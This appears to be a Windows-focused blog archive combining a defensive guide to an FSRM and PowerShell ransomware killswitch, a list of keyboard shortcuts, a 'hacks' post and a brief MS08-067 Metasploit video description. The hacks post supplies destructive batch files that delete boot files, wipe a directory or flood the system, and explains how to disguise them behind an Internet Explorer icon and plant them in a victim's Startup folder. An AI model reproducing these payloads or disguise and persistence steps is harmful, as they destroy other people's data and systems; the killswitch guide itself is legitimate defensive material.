Archive for the ‘Windows Server’ Category

Many companies spend a fortune on Next Generation anti-virus and Machine Learning “AI” tools to halt the spread of ransomware. Although I strongly believe that user education and training play a key part in this, Windows itself can help in a massive way. Windows File Server Resource Manager (FSRM), a tool already built into Windows Server, can halt the spread and quarantine the accounts that are affected.

This solution uses PowerShell and Windows File Server Resource Manager to automatically lock out a user account when ransomware activity is detected.

Installing FSRM
First and foremost, you will need to set up FSRM on your file servers. This feature is part of the File Services Role and can be installed with the following PowerShell command (all one line).

Install-WindowsFeature -Name FS-Resource-Manager -IncludeManagementTools

Take note, FSRM is only available on Windows Server. If you’re interested in workstation mitigation, comment below and I’ll get to writing!

Get Email Alerts
In order to be emailed about the action our killswitch takes, we will need to set up the SMTP server settings within FSRM. We don’t necessarily have to do this right now, but it saves us from seeing annoying prompts in the later steps.

Open up Server Manager > File and Storage Services > right-click on your server > File Server Resource Manager (this can also be accessed through Administrative Tools). Once opened, right-click “File Server Resource Manager (Local)” in the left pane and select “Configure Options…”. Go ahead and set up your email settings: the SMTP server, the default sender address and the administrator recipients.

Set up Killswitch Directory
In your corporate file share(s), set up a directory that begins with an underscore. If the ransomware is encrypting alphabetically, this will ensure that it is tripped as soon as possible. Within that directory, we will place a text file called killswitch.txt.

Set Up the Killswitch
Many variants of ransomware look to find mapped drives and will begin encrypting data in alphabetical order. Because of this, our killswitch is going to be a directory placed in the file shares that begins with an underscore.

Create a new File Group under File Screening Management that matches all files (*) except our killswitch.txt; this example calls it “All File Types”.

Next, we will create a File Screen Template (called “Detect Ransomware” in this example) that uses the “All File Types” File Group we just created.

We will want to configure email alerts, so on the E-Mail Message tab, fill out the pertinent information.

We also want to automate the removal of the offending user in order to stop the ransomware from encrypting our entire file server. We will do this with some PowerShell. Copy the following and save it to your preferred location. In this example, I’m just saving it to C:\kickuser.ps1.

# FSRM passes the account that wrote the file (the [Source Io Owner] variable) as -username
param(
    [string]$username = ""
)

# Add a Deny entry for that account on every non-administrative share on this server
Get-SmbShare -Special $false | ForEach-Object {
    Block-SmbShareAccess -Name $_.Name -AccountName "$username" -Force
}
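A hardened version of the lockout script, added here as an illustration rather than the post’s own script: it requires a non-empty account name, refuses to block built-in service principals (a spoofed owner would otherwise take the file server down), closes the user’s open SMB sessions so in-flight writes stop, and writes an Application event that a SIEM can alert on. The event source name and event IDs are assumptions.

```powershell
# Added example, not the original post's script. Event source and IDs are assumed.
param(
    [Parameter(Mandatory = $true)]
    [ValidateNotNullOrEmpty()]
    [string]$Username   # FSRM supplies "[Source Io Owner]", e.g. CORP\jsmith
)

$ErrorActionPreference = 'Stop'
$logSource = 'RansomwareKillswitch'   # assumed event source name

# Register the event source once so each lockout leaves an audit trail
# (Write-EventLog fails if the source does not exist).
if (-not [System.Diagnostics.EventLog]::SourceExists($logSource)) {
    New-EventLog -LogName Application -Source $logSource
}

# Never deny built-in service principals: blocking SYSTEM or the service
# accounts on every share would be a self-inflicted outage.
$protected = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')
if ($protected -contains $Username) {   # -contains is case-insensitive
    Write-EventLog -LogName Application -Source $logSource -EntryType Warning -EventId 9002 `
        -Message "Killswitch tripped by protected principal '$Username'; no action taken."
    return
}

# A Deny entry wins over any Allow, so the account loses access even when
# its rights come from group membership.
$blocked = @()
foreach ($share in Get-SmbShare -Special $false) {
    Block-SmbShareAccess -Name $share.Name -AccountName $Username -Force
    $blocked += $share.Name
}

# Existing sessions keep their open handles, so tear them down as well.
Get-SmbSession | Where-Object { $_.ClientUserName -eq $Username } | Close-SmbSession -Force

Write-EventLog -LogName Application -Source $logSource -EntryType Error -EventId 9001 `
    -Message "Killswitch tripped by '$Username'. Blocked shares: $($blocked -join ', '). Sessions closed."
```

The Deny entries are permanent until an administrator removes them with Unblock-SmbShareAccess, which is the intended behaviour: restoring access should be a deliberate step after the machine that tripped the screen has been cleaned.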

On the Command tab, check “Run this command or script:” and enter the following:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

For the command arguments, insert the following. The script path must match wherever you saved the script in the previous step; the example below uses C:\smbblock.ps1, so change it to C:\kickuser.ps1 if you used that name.

-Command "& {C:\smbblock.ps1 -username '[Source Io Owner]'}"

Set it to run as Local System.

Apply the File Screen
From within FSRM, select File Screening Management > File Screens and create a new File Screen. Set the path to your underscore directory and use the “Detect Ransomware” File Screen template that we created earlier.
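The same configuration (mail settings, bait directory, File Group, template with its e-mail, event and command actions, and the File Screen) can be scripted with the FileServerResourceManager module so it can be rolled out to every file server identically. This is an added example, not the post’s own code; the share path, SMTP host, addresses and script location are placeholders.

```powershell
# Added example, not from the original post: FSRM killswitch set up with the
# FileServerResourceManager cmdlets instead of the GUI. Placeholder values are marked.
Import-Module FileServerResourceManager

$sharePath  = 'D:\Shares\Corporate'                 # assumed share root
$killDir    = Join-Path $sharePath '_killswitch'     # underscore sorts first alphabetically
$scriptPath = 'C:\kickuser.ps1'                      # lockout script from the post
$psExe      = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"

# 1. Mail settings (the "Configure Options..." dialog); addresses are placeholders
Set-FsrmSetting -SmtpServer 'smtp.example.com' -FromEmailAddress 'fsrm@example.com' `
    -AdminEmailAddress 'secops@example.com'

# 2. Bait directory and file
New-Item -ItemType Directory -Path $killDir -Force | Out-Null
Set-Content -Path (Join-Path $killDir 'killswitch.txt') -Value 'Do not modify.'

# 3. File Group: every file except the bait file itself
New-FsrmFileGroup -Name 'All File Types' -IncludePattern @('*') -ExcludePattern @('killswitch.txt')

# 4. Actions: e-mail the FSRM admin, write an event, run the lockout script as Local System.
#    [Source Io Owner] and [Source File Path] are FSRM's own notification variables.
$mail = New-FsrmAction -Type Email -MailTo '[Admin Email]' `
    -Subject 'Ransomware killswitch tripped by [Source Io Owner]' `
    -Body 'User [Source Io Owner] wrote [Source File Path] on [Server]. Share access has been blocked.'
$event = New-FsrmAction -Type Event -EventType Warning `
    -Body 'Ransomware killswitch tripped by [Source Io Owner] at [Source File Path]'
$cmd = New-FsrmAction -Type Command -Command $psExe `
    -CommandParameters "-NoProfile -ExecutionPolicy Bypass -Command `"& {$scriptPath -username '[Source Io Owner]'}`"" `
    -SecurityLevel LocalSystem

# 5. Active template (blocks the write as well as notifying) and the screen on the bait directory
New-FsrmFileScreenTemplate -Name 'Detect Ransomware' -IncludeGroup 'All File Types' `
    -Notification @($mail, $event, $cmd) -Active
New-FsrmFileScreen -Path $killDir -Template 'Detect Ransomware'
```

Re-run the same script on each additional file server; the command action fires on the server hosting the screen, so the lockout script must exist locally on every one of them.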


Testing
To test, I created a test account (test guy) and modified the file. I was instantly locked out of the share. The output of our PowerShell script, as well as the share permissions, confirmed this.


Wrapping Up
This methodology should help mitigate some risk around ransomware attacks. In the future, it may also be beneficial to make the following changes:

  1. Create a secondary killswitch in a ZZZ_Killswitch directory in case a ransomware variant starts in reverse-alphabetical order.

I believe in using the resources we already have available to us in helping secure our organisations, and hopefully, this helps. Feel free to comment with any questions or suggestions.


Windows Shortcuts You Should All Know To Save Time (a PDF cheat sheet is available for download)

Windows Explorer Keyboard Shortcuts

* END (Display the bottom of the active window)

* HOME (Display the top of the active window)

* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)

* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

* NUM LOCK+Minus sign (-) (Collapse the selected folder)

* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)

* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)


Shortcut Keys for Character Map

* After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:

* RIGHT ARROW (Move to the right or to the beginning of the next line)

* LEFT ARROW (Move to the left or to the end of the previous line)

* UP ARROW (Move up one row)

* DOWN ARROW (Move down one row)

* PAGE UP (Move up one screen at a time)

* PAGE DOWN (Move down one screen at a time)

* HOME (Move to the beginning of the line)

* END (Move to the end of the line)

* CTRL+HOME (Move to the first character)

* CTRL+END (Move to the last character)

* SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)


Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

* CTRL+O (Open a saved console)

* CTRL+N (Open a new console)

* CTRL+S (Save the open console)

* CTRL+M (Add or remove a console item)

* CTRL+W (Open a new window)

* F5 key (Update the content of all console windows)

* ALT+SPACEBAR (Display the MMC window menu)

* ALT+F4 (Close the console)

* ALT+A (Display the Action menu)

* ALT+V (Display the View menu)

* ALT+F (Display the File menu)

* ALT+O (Display the Favourites menu)


MMC Console Window Keyboard Shortcuts

* CTRL+P (Print the current page or active pane)

* ALT+Minus sign (-) (Display the window menu for the active console window)

* SHIFT+F10 (Display the Action shortcut menu for the selected item)

* F1 key (Open the Help topic, if any, for the selected item)

* F5 key (Update the content of all console windows)

* CTRL+F10 (Maximize the active console window)

* CTRL+F5 (Restore the active console window)

* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)

* F2 key (Rename the selected item)

* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)


Remote Desktop Connection Navigation

* CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)

* ALT+PAGE UP (Switch between programs from left to right)

* ALT+PAGE DOWN (Switch between programs from right to left)

* ALT+INSERT (Cycle through the programs in most recently used order)

* ALT+HOME (Display the Start menu)

* CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)

* ALT+DELETE (Display the Windows menu)

* CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

* CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)


Internet Explorer navigation

* CTRL+B (Open the Organize Favourites dialog box)

* CTRL+E (Open the Search bar)

* CTRL+F (Start the Find utility)

* CTRL+H (Open the History bar)

* CTRL+I (Open the Favourites bar)

* CTRL+L (Open the Open dialog box)

* CTRL+N (Start another instance of the browser with the same Web address)

* CTRL+O (Open the Open dialog box, the same as CTRL+L)

* CTRL+P (Open the Print dialog box)

* CTRL+R (Update the current Web page)

* CTRL+W (Close the current window)


Now, as you read this post you may think to yourself that you would like to try these scripts. Well, I will warn you again: ‘Never Try These Hacks On Your Computer’. The safest way to try these is in a virtual machine; I recommend VMware Player or VirtualBox, both of which are free for personal use.

We will be creating some batch files, so you will need to enable ‘Show hidden files, folders and drives’ and also untick the box ‘Hide extensions for known file types’.

To do this, type ‘folder options’ into the Windows search bar and open the Folder Options dialog box.

1) Crash A Computer With A Simple Link

This is a simple JavaScript called “exploit”. This script can hang or crash your computer: it floods you with an infinite number of mailto: windows. To prevent this you need to end the script’s process before it uses up your RAM, which in practice means rebooting your computer before it fully consumes your RAM.

WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

Click Here. (http://tiny.cc/ibJUN)

2) Make Countless Number Of Folders With A Single Click

A simple three-line batch file can be very dangerous and also quite funny. Paste the code below into Notepad and save it as IE.bat.

@echo off

:top

md %random%

goto top

@echo off > makes the window appear blank while the countless folders are created in the background.

md %random% > creates a folder with a random name (md is the DOS command for making directories).

goto top > sends control back to the :top label, causing an infinite loop.

To make this more enticing, drop the batch file on the C drive and create a shortcut on the desktop. Now right-click on the shortcut and select ‘Properties’.

Now select ‘Change Icon’ and browse to C:\Program Files\Internet Explorer\iexplore.exe.

This has now given you an Internet Explorer icon that will execute the malicious batch file; delete the original IE icon from the desktop.

3) Shut Down Your PC For Ever

This is the most malicious hack: it deletes the boot-critical system files and will stop the victim’s PC from booting.

To perform this, copy the text below into a text file and save it as ‘Shutdown.bat’.

You can always do the same as in the hack above: copy it to the victim’s PC and send a shortcut to the desktop.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

DON’T RUN THE BATCH FILE, YOU WONT BE ABLE TO RECOVER AFTER YOU RUN IT!!!

4) RAM Crashing Trick.

Open Notepad and type the following code:

:A

Start http://www.facebook.com

Goto A

Save the file as facebook.bat.

This code will loop infinitely, opening http://www.facebook.com in the browser each time.

5) Delete ALL System Files With Just 6 Character Command

Copy the following command into Notepad and save it as facebook.bat.

Del *.*

So when the victim runs this file, all the data in the current directory will be deleted.

If you have access to the victim’s PC you can drop any of these batch files in the ‘Startup’ folder; they will then run when the user restarts their machine.

C:\Users\VICTIMS NAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

These are for educational purposes only, please do not use this information for malicious purposes. Caintech.co.uk take no responsibility for the actions of any individuals however feedback would be most appreciated.

This tutorial is for demonstration purposes only – Please use this knowledge responsibly

This video will show you how to create a reverse SSH connection to a server/workstation

This exploit takes advantage of vulnerability MS08-067 using Metasploit on Kali.
This is a Kali VM attacking a Microsoft Windows Server 2008 machine (it will also work on any machine without the patch).

The moral of this is to keep your systems updated.

http://www.kali.org

http://support.microsoft.com/kb/958644

Caintech.co.uk – Here comes Kali

Affected Software

Operating Systems:

* Microsoft Windows 2000 Service Pack 4
* Windows XP Service Pack 2
* Windows XP Service Pack 3
* Windows XP Professional x64 Edition
* Windows XP Professional x64 Edition Service Pack 2
* Windows Server 2003 Service Pack 1
* Windows Server 2003 Service Pack 2
* Windows Server 2003 x64 Edition
* Windows Server 2003 x64 Edition Service Pack 2
* Windows Server 2003 with SP1 for Itanium-based Systems
* Windows Server 2003 with SP2 for Itanium-based Systems
* Windows Vista and Windows Vista Service Pack 1
* Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
* Windows Server 2008 for 32-bit Systems
* Windows Server 2008 for x64-based Systems
* Windows Server 2008 for Itanium-based Systems